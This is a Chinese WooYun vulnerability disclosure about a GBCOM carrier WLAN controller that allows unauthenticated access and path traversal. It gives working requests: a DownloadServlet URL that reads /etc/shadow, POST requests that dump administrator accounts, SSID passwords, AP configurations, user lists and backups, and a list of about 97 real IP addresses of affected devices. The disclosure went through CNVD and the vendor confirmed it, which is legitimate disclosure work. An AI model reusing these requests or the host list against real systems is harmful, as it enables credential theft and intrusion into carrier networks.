当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121010

漏洞标题:上海寰创某WLAN产品存在全功能未授权访问&任意文件遍历(三大运营商使用/附97案例)

相关厂商:上海寰创通信科技股份有限公司

漏洞作者: YY-2012

提交时间:2015-06-17 12:14

修复时间:2015-09-20 09:34

公开时间:2015-09-20 09:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向第三方安全合作伙伴开放
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

运营商WLAN产品,三大运营商是否中枪?(可直接获取管理员账号密码等)

详细说明:

上海寰创通信科技股份有限公司--运营商WLAN产品:

http://www.gbcom.com.cn/index.aspx?cat_code=yysWLANcp


发现存在未登录情况下全功能可未授权访问&任意系统文件遍历
从设备系统登录页面源码中发现,上海寰创通信科技股份有限公司就是该产品的制造商。

aaaaaaaaa111111111111111.jpg

漏洞证明:

未授权任意系统文件遍历:

http://url/DownloadServlet?fileName=../../etc/shadow


qqqqqqqqqqqqq111111111111111111.jpg


aaaaaaaa33333333333.jpg


aaaaaaa44444444444444.jpg


未授权下获取系统全功能信息(举例部分功能):
获取管理员账号密码

POST /acUser.shtml?method=getList HTTP/1.1
Host: 58.16.195.122
Content-Length: 17
Origin: http://58.16.195.122
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://58.16.195.122/loginAction.shtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=
start=0&limit=128


其中密码为普通md5。

qqqqqqqqq2222222222222222222.jpg


获取接入AP信息(其中参数limit表示显示数量条数)

POST /accessApInfo.shtml?method=getAccessAps HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 31
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=120&type=0&value=


aaaaaaaa6666666666666666666.jpg


获取WLAN的SSID信息

POST /wlanService.shtml?method=getList HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 16
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=20


以上获取SSID名称,根据以上获取的名称可进行一下操作获取相关密码:

/wlanDelService.shtml?method=getSecurityBySsid&acSsid=China%20Unicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=ChinaNet
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=ChinaUnicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=Chinaunicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=management


acSsid等于该wlan名称

aaaaaaaaaa55555555555555555.jpg


获取AP设备管理信息

POST /apConfig.shtml?method=getApCfgList HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 30
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=100&type=0&value=


aaaaaaaa7777777777777.jpg


获取接入用户信息下载

http://url/DownloadServlet?fileName=accessuserinfo.xls


aaaaaaaaa88888888888888888.jpg


系统备份文件下载

http://url/DownloadServlet?fileName=ac.dat


aaaaaaaaaa111111111000000000000000000.jpg


功能不一一举例了。
97案例:

https://110.17.174.254/
http://60.31.242.130/
http://60.31.245.230/
http://110.18.192.129/
http://120.80.178.254/
http://120.80.178.252/
http://119.52.175.171/
http://221.10.47.70/
http://120.80.178.253/
http://58.23.96.250/
https://60.13.17.190/
http://60.13.0.101/
http://123.139.245.90/
https://218.202.34.12/
http://221.7.156.174/
https://218.202.34.14/
http://113.200.248.98/
http://123.146.82.66/
https://218.29.2.130/
http://58.18.92.254/
http://125.45.148.46/
http://218.107.221.6/
http://61.163.209.238/
http://61.54.142.242/
http://218.202.34.10/
http://123.139.201.98/
http://218.107.221.2/
http://218.202.34.14/
http://218.202.34.12/
http://119.52.142.194/
http://119.52.142.190/
http://119.6.166.234/
https://118.182.120.251/
http://58.16.192.58/
http://202.111.170.22/
http://119.4.212.21/
http://101.68.215.102/
http://221.10.132.194/
http://119.6.168.50/
http://112.83.250.250/
https://61.180.217.70/
http://60.12.43.107/
http://119.55.60.69/
http://221.13.80.146/
http://119.4.167.76/
http://58.244.231.186/
https://113.8.197.202/
http://119.6.165.234/
http://61.53.64.252:8080/
http://119.6.108.20/
http://221.2.141.46/
http://124.165.176.6/
http://123.157.221.182/
http://218.29.3.70/
http://221.10.223.229/
http://115.60.208.15/
http://218.104.128.166/
http://61.53.64.251:8080/
http://221.9.161.227/
http://222.138.69.194:8080/
http://110.17.174.254/
http://218.8.213.34/
http://115.60.245.58/
http://123.157.216.226/
http://222.141.70.22/
http://60.10.9.228/
http://222.140.23.213/
http://111.85.98.182/
http://221.9.161.242/
http://221.9.161.219/
http://221.9.166.215/
http://121.31.120.30/
http://218.29.2.154/
http://221.12.98.134/
http://221.5.213.155:8080/
http://218.28.227.46/
http://221.5.213.155:8080/
http://175.23.234.2/
http://222.141.64.57/
http://122.143.59.204/
http://101.68.88.194/
http://58.16.195.122/
https://58.17.56.169/
http://221.7.27.146/
http://125.40.54.53/
http://124.88.218.250/
http://113.195.134.110/
http://123.146.170.168/
http://221.2.141.58:8080/
http://115.60.224.18/
http://119.6.53.34/
http://125.40.180.16/
http://119.6.53.38/
http://125.40.172.245/
https://111.11.130.47/
http://36.32.191.3:8888/
http://125.40.6.85/


aaaaaaaaaa99999999999999999999.jpg

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-22 09:32

厂商回复:

cnvd确认并复现所述情况,已经由cnvd通过公开联系渠道电话和邮件向软件生产厂商通报,由其后续协调用户单位处置。按多个风险进行评分,rank 20

最新状态:

暂无